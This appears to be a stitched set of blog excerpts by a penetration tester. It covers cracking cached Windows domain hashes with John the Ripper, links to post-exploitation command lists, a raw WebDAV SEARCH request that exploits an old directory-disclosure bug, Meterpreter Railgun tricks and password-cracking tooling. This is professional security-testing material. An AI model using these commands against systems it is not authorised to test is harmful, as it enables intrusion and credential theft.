John the ripper only takes one word list at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John’s stdin function but I like to run rules against my lists and I didn’t see any how-tos on doing this. Here is my way: ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist=dicts/file --rules victim_cachedump.txt This command will ls the ‘dicts’ directory, pipe it to xargs, which will spit out the command it uses for each itteration (-t) and replace every time it see the word file with the line/itteration its on (-I).
I’ve had a private list of commands that I run on Windows or Linux when I pop a shell, as I’m sure most pentesters do. It isn’t so much a thing of hoarding as much it is just jumbled notes that are ‘not worth posting’ Well, I made two (now 3) public google docs (anyone can edit) *don’t be a dick clause Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US
I am way late to the game on this, but if you have a blog, a twitter handle, or even better (in this specific case) a CISSP, please support Wim Remes (@wimremes), as he has submitted to become a member of the (ISC)2 Board of Directors. On twitter use the hashtag: #wim4board Lets help the certifications, especially the one with so much corporate/gov acceptance, get better. His petition: http://blog.remes-it.be/petition.html Other supporters:
This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts, this is an old vuln) and is very useful: Send this: SEARCH / HTTP/1.1 Host: target Content-Type: text/xml Content-Length: 133 <?xml version="1.0"?> <g:searchrequest xmlns:g="DAV:"> <g:sql> Select "DAV:displayname" from scope() </g:sql> </g:searchrequest> And expect something like this back:
Update 1: No this doesn’t need to be in memory since you control the system but it was a fun challenge Update 2: The info from the ‘adduser’ payload says ‘Create a new user and add them to local administration group’ - I’m guessing since I ran this on a DC is why I didn’t notice this but it is something to keep in mind when running this script. Update 3: Here is a powershell way of doing things from a CSV, you can do some passwords in the CSV and keep it for reference too.
I saw a post back in June and it just recently came up again: http://www.securityartwork.es/2011/06/01/dns-port-forwarding-con-meterpreter/ It looked like a lot of hard work to set that up and I’m really lazy. I didn’t want to have to go through all that every time I got onto a new network. So, I made a very simple meterpreter post module to just call a Windows API key called ‘gethostbyaddr’ using Railgun. TL:DR; You can download the post module here: ipresolver.
One important thing to note about Railgun is that you are querying the API and just as if you were using C++ the API you are calling just might not be there on the system you are trying to call it on. So here is a quick trick to find out if a the function (API) that you are trying to call is available to you: For my example I’m using ‘getaddrinfo’ since it’s life in Windows is somewhat odd.
Also known as “How to practice what we preach”. I don’t know how long I’ve been telling clients that they need to have a minimum password length of 15 characters to make it so there is no chance LM will be stored (and a cursory bonus that their password won’t be close to their original). But I’ve never tried setting it myself. Well, a client called me out. You can’t! (well at least not through the UI )
This series was interrupted a bit by the new Metasploit HTTP/HTTPS payloads (more info). Definitely not complaining though as the new features *(as will be discussed in part 2) are some epic new additions to the payloads list. However an important change happened while the craziness over the new payloads was going on. ScriptJunkie snuck in an awesome change to msfvenom (a.k.a. msffsm). Here is the link to the ticket about the change (link) and the revision (r13057)
I’ve been cracking passwords for a while and use a myriad of tools in a certain order to get the job done. I find that Cain is still my Go-to for allowing me to visualize the process and do some basic sorting (really wish I could search in-app). But I’ve been asking around on twitter some questions like Why is GPU cracking for 50k hashes faster than Rainbow Tables (most say the bottleneck is the HDD read style and speed) and many asked what all of my compalints are so I figured this would be the best place (vice multiple emails)